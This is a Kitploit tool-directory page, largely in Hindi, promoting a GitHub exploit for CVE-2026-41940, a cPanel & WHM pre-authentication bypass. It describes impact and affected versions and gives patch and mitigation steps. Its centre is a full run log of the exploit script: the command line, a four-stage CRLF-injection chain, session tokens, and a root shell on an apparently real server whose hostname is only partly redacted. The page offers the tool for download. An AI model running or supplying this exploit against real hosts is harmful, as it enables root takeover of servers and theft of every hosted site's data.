Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — CVE-2026-41940 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-41940
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHub0xblackash/cve-2026-41940

CVE-2026-41940

CVE-2026-41940

रिपॉजिटरी देखें
11144 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ CVE-2026-41940 - cPanel & WHM प्रमाणीकरण बाइपास

ChatGPT छवि 1 मई, 2026, 08_27_37 PM
CVSS 9.8 Critical Actively Exploited

cPanel & WHM में गंभीर प्री-ऑथेंटिकेशन बाइपास


📌 अवलोकन

CVE-2026-41940 एक गंभीर प्रमाणीकरण बाइपास भेद्यता है जो cPanel & WHM और WP Squared को प्रभावित करती है।

एक अप्रमाणित दूरस्थ हमलावर लॉगिन को पूरी तरह से बाइपास कर सकता है और सर्वर तक पूर्ण प्रशासनिक (root/WHM) पहुंच प्राप्त कर सकता है।

पैच जारी होने से पहले यह दोष सक्रिय रूप से वास्तविक दुनिया में शोषित किया गया था।


🎯 गंभीरता

मीट्रिकमान
CVSS 3.1 स्कोर9.8 (गंभीर)
CVSS 4.0 स्कोर9.3 (गंभीर)
हमला वेक्टरनेटवर्क
जटिलतानिम्न
विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं

🛠️ प्रभावित उत्पाद

  • cPanel & WHM — पैच होने तक 11.40 के बाद के सभी संस्करण
  • WP Squared — 136.1.7 से पहले के संस्करण

~1.5 मिलियन cPanel इंस्टेंस खुलासे के समय संभावित रूप से उजागर हुए थे।


🔥 प्रभाव

सफल शोषण से हमलावर निम्नलिखित कर सकते हैं:

  • WHM/root तक पूर्ण पहुंच प्राप्त करना
  • सभी होस्टेड वेबसाइटों और खातों पर कब्जा करना
  • सर्वर कॉन्फ़िगरेशन को संशोधित करना
  • संवेदनशील डेटा चुराना
  • स्थायी बैकडोर तैनात करना

✅ यहाँ SUCCESS कैसा दिखता है (जैसा कि आपने Eye Security स्क्रीनशॉट में दिखाया):

यदि यह काम करता है तो आपको कुछ इस तरह दिखना चाहिए:

┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
[sudo] password for kali: 


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  Author : Ashraf Zaryouh / @0xBlackash

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : shell

13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
13:41:24 [PWND]   Token    : /cpsess2634xxxx267
13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
13:41:24 [PWND]   Version  : 11.86.0.40
13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell

════════════════════════════════════════════════════════════
  WHM Shell — server.xxxxxxx.xx
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] ▶ id
13:41:28 [ API] gethostname → HTTP 500
  uid=0(root) gid=0(root) groups=0(root)
[email protected] ▶ exit
Exiting shell.

══════════════════════════════════════════════════════════════════════
  CVE-2026-41940.py — CVE-2026-41940 Scan Complete
  Time: 13.9s  ·  Targets: 1
──────────────────────────────────────────────────────────────────────

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://xx.xx.xx.xx:2087
  Version  : 11.86.0.40
  Token    : /cpsess263xxxx267
  API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
  Session  : :W43DhFApxxxD8Jdw...
  Evidence : {"version":"11.86.0.40"}

══════════════════════════════════════════════════════════════════════


✅ निश्चित संस्करण

28 अप्रैल, 2026 को पैच किया गया

  • cPanel & WHM को नवीनतम बिल्ड में अपडेट करें
  • WP Squared को संस्करण 136.1.7 या नवीनतम में अपडेट करें

तत्काल कार्रवाई अनुशंसित


🛡️ शमन और सुरक्षा

  • नवीनतम संस्करण में तुरंत अपडेट करें
  • पोर्ट 2082, 2083, 2086, 2087 तक सार्वजनिक पहुंच को ब्लॉक करें
  • WAF नियम सक्षम करें (Cloudflare, ModSecurity, आदि)
  • प्रबंधन पहुंच के लिए IP अनुमति सूची या VPN का उपयोग करें

📚 संदर्भ

  • NVD - CVE-2026-41940
  • watchTowr Labs - तकनीकी गहन विश्लेषण
  • cPanel आधिकारिक सुरक्षा सलाहकार
  • CISA KEV सूची


सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

अंतिम अद्यतन: मई 2026

टूल डाउनलोड करें